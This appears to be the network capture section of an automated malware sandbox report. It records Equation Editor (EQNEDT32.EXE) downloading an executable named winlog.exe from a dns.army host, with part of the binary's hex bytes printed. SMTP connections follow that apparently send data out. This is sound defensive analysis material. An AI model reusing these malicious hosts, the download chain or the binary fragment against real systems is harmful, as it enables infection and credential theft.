Jan 27, 2021 09:15:48.642298937 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642302990 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642333984 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642344952 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642370939 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642385006 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642405033 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642407894 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642443895 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642453909 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642479897 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642494917 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642514944 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642515898 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642573118 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642574072 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642615080 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642627001 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642651081 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642663002 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642688036 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642699003 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642724991 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642736912 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642760992 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642771959 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642797947 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642810106 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642834902 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642846107 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642880917 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642896891 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642921925 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642942905 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642956972 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642977953 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.642993927 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.642997980 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643032074 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643049002 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643066883 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643081903 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643102884 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643126965 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643141031 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643156052 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643186092 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643193960 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643227100 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643240929 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643261909 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643280983 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643299103 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643305063 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643335104 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643351078 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643369913 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643383980 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643405914 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643407106 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643443108 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643455982 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643488884 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643493891 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643528938 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643546104 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643564939 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643584967 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643604040 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643615961 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643640995 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643662930 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643675089 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643692017 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643704891 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:48.643714905 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:48.643861055 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:49.163906097 CET	80	49165	103.153.76.181	192.168.2.22
Jan 27, 2021 09:15:49.164002895 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:15:49.251352072 CET	49165	80	192.168.2.22	103.153.76.181
Jan 27, 2021 09:17:18.749893904 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:18.925721884 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:18.925906897 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:19.568044901 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:19.568444014 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:19.744204044 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:19.744249105 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:19.746047974 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:19.922535896 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:19.923455000 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:20.101150990 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:20.102175951 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:20.279299021 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:20.280035973 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:20.464610100 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:20.465126038 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:20.641292095 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:20.645015001 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:20.645195961 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:20.645735025 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:20.645859957 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:20.820909977 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:20.821330070 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:20.919286013 CET	587	49166	208.91.199.225	192.168.2.22
Jan 27, 2021 09:17:21.123286009 CET	49166	587	192.168.2.22	208.91.199.225
Jan 27, 2021 09:17:21.700867891 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:21.874068022 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:21.874212027 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:22.420790911 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:22.421289921 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:22.594381094 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:22.594434023 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:22.594854116 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:22.768768072 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:22.769701004 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:22.944883108 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:22.945167065 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.119394064 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.119929075 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.302701950 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.303127050 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.476356030 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.478243113 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.479047060 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.479321003 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.479598045 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.480436087 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.652133942 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.652293921 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.652400970 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.692413092 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.692729950 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.825479984 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.825797081 CET	49167	587	192.168.2.22	208.91.198.143
Jan 27, 2021 09:17:23.865796089 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.865859032 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:23.999012947 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:24.103679895 CET	587	49167	208.91.198.143	192.168.2.22
Jan 27, 2021 09:17:24.306516886 CET	49167	587	192.168.2.22	208.91.198.143

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 09:15:46.101658106 CET	52197	53	192.168.2.22	8.8.8.8
Jan 27, 2021 09:15:46.163057089 CET	53	52197	8.8.8.8	192.168.2.22
Jan 27, 2021 09:17:18.356118917 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 09:17:18.545075893 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 09:17:18.545957088 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 09:17:18.602505922 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 09:17:18.667681932 CET	52838	53	192.168.2.22	8.8.8.8
Jan 27, 2021 09:17:18.724380016 CET	53	52838	8.8.8.8	192.168.2.22
Jan 27, 2021 09:17:21.248164892 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 09:17:21.451677084 CET	53	61200	8.8.8.8	192.168.2.22
Jan 27, 2021 09:17:21.452619076 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 09:17:21.509044886 CET	53	61200	8.8.8.8	192.168.2.22
Jan 27, 2021 09:17:21.509840012 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 09:17:21.571635008 CET	53	61200	8.8.8.8	192.168.2.22
Jan 27, 2021 09:17:21.642004967 CET	49548	53	192.168.2.22	8.8.8.8
Jan 27, 2021 09:17:21.698662043 CET	53	49548	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 09:15:46.101658106 CET	192.168.2.22	8.8.8.8	0xaf1e	Standard query (0)	suresb1sndyintercont.dns.army	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.356118917 CET	192.168.2.22	8.8.8.8	0x8282	Standard query (0)	smtp.migeulez.com	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.545957088 CET	192.168.2.22	8.8.8.8	0x8282	Standard query (0)	smtp.migeulez.com	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.667681932 CET	192.168.2.22	8.8.8.8	0xebf1	Standard query (0)	smtp.migeulez.com	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.248164892 CET	192.168.2.22	8.8.8.8	0xd368	Standard query (0)	smtp.migeulez.com	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.452619076 CET	192.168.2.22	8.8.8.8	0xd368	Standard query (0)	smtp.migeulez.com	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.509840012 CET	192.168.2.22	8.8.8.8	0xd368	Standard query (0)	smtp.migeulez.com	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.642004967 CET	192.168.2.22	8.8.8.8	0x4226	Standard query (0)	smtp.migeulez.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 27, 2021 09:15:46.163057089 CET	8.8.8.8	192.168.2.22	0xaf1e	No error (0)	suresb1sndyintercont.dns.army		103.153.76.181	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.545075893 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	smtp.migeulez.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 09:17:18.545075893 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.545075893 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.545075893 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.545075893 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.602505922 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	smtp.migeulez.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 09:17:18.602505922 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.602505922 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.602505922 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.602505922 CET	8.8.8.8	192.168.2.22	0x8282	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.724380016 CET	8.8.8.8	192.168.2.22	0xebf1	No error (0)	smtp.migeulez.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 09:17:18.724380016 CET	8.8.8.8	192.168.2.22	0xebf1	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.724380016 CET	8.8.8.8	192.168.2.22	0xebf1	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.724380016 CET	8.8.8.8	192.168.2.22	0xebf1	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:18.724380016 CET	8.8.8.8	192.168.2.22	0xebf1	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.451677084 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	smtp.migeulez.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 09:17:21.451677084 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.451677084 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.451677084 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.451677084 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.509044886 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	smtp.migeulez.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 09:17:21.509044886 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.509044886 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.509044886 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.509044886 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.571635008 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	smtp.migeulez.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 09:17:21.571635008 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.571635008 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.571635008 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.571635008 CET	8.8.8.8	192.168.2.22	0xd368	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.698662043 CET	8.8.8.8	192.168.2.22	0x4226	No error (0)	smtp.migeulez.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 09:17:21.698662043 CET	8.8.8.8	192.168.2.22	0x4226	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.698662043 CET	8.8.8.8	192.168.2.22	0x4226	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.698662043 CET	8.8.8.8	192.168.2.22	0x4226	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 09:17:21.698662043 CET	8.8.8.8	192.168.2.22	0x4226	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

suresb1sndyintercont.dns.army

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	103.153.76.181	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 09:15:46.397888899 CET	0	OUT	GET /receipst/winlog.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: suresb1sndyintercont.dns.army Connection: Keep-Alive
Jan 27, 2021 09:15:46.624223948 CET	2	IN	HTTP/1.1 200 OK Date: Wed, 27 Jan 2021 08:15:44 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34 Last-Modified: Wed, 27 Jan 2021 06:00:08 GMT ETag: "106000-5b9db7bb52a00" Accept-Ranges: bytes Content-Length: 1073152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 0f 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c6 0e 00 00 98 01 00 00 00 00 00 9e e5 0e 00 00 20 00 00 00 00 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c e5 0e 00 4f 00 00 00 00 00 0f 00 7c 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 c5 0e 00 00 20 00 00 00 c6 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 95 01 00 00 00 0f 00 00 96 01 00 00 c8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 10 00 00 02 00 00 00 5e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 e5 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 98 43 02 00 1c 5c 01 00 03 00 00 00 01 00 00 06 b4 9f 03 00 98 45 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 70 04 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 26 00 02 28 31 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELx`P @ @LO\| H.text `.rsrc\|@@.reloc^@BHC\E0(((o( (!("(#($N(op(%&(&s's(s)ss+0~o,+0~o-+0~o.+0~o/+0~o0+&(10<~(2,!rp(3o4s5~+*0
Jan 27, 2021 09:15:46.624253035 CET	3	IN	Data Raw: 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0c 00 00 06 72 2f 00 00 70 7e 07 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 0b 07 74 26 00 00 01 0a 2b 00 06 2a 00 00 Data Ascii: ~+"0&(r/p~o6(7t&+0<~(2,!rEp(3o4s5~+0~+"0&(rwp~o6(7t&+*0&
Jan 27, 2021 09:15:46.624265909 CET	4	IN	Data Raw: 00 00 04 02 28 2a 00 00 06 00 2a 00 1b 30 02 00 31 00 00 00 09 00 00 11 00 00 03 2c 0b 02 7b 0d 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0d 02 7b 0d 00 00 04 6f 47 00 00 0a 00 00 00 de 0a 00 02 03 28 48 00 00 0a 00 dc 00 2a 00 00 00 01 10 00 00 02 00 Data Ascii: (*01,{+,{oG(H$%0sIo,sJo.sJo0sKo2sKo4sLo6sLo8sMo:sNo<sLo>sJo@sK
Jan 27, 2021 09:15:46.624277115 CET	6	IN	Data Raw: a2 25 18 72 a5 02 00 70 a2 6f 69 00 00 0a 00 02 6f 39 00 00 06 1c 1f 7c 73 52 00 00 0a 6f 53 00 00 0a 00 02 6f 39 00 00 06 72 b5 02 00 70 6f 54 00 00 0a 00 02 6f 39 00 00 06 20 be 00 00 00 1f 15 73 55 00 00 0a 6f 56 00 00 0a 00 02 6f 39 00 00 06 Data Ascii: %rpoio9\|sRoSo9rpoTo9 sUoVo9\oWo;(codo;ojo3oko;ojo9oko;ojo7oko;ojo5oko;ojo-oko;ojo1ok
Jan 27, 2021 09:15:46.847124100 CET	7	IN	Data Raw: 00 0a 00 02 28 6a 00 00 0a 02 6f 3d 00 00 06 6f 6b 00 00 0a 00 02 28 6a 00 00 0a 02 6f 3f 00 00 06 6f 6b 00 00 0a 00 02 28 6a 00 00 0a 02 6f 3b 00 00 06 6f 6b 00 00 0a 00 02 28 6a 00 00 0a 02 6f 2b 00 00 06 6f 6b 00 00 0a 00 02 17 6f 75 00 00 0a Data Ascii: (jo=ok(jo?ok(jo;ok(jo+okourp(T(vo+owo;oxo;oy(x(y&{+"}&{+07KsB{,oz}{
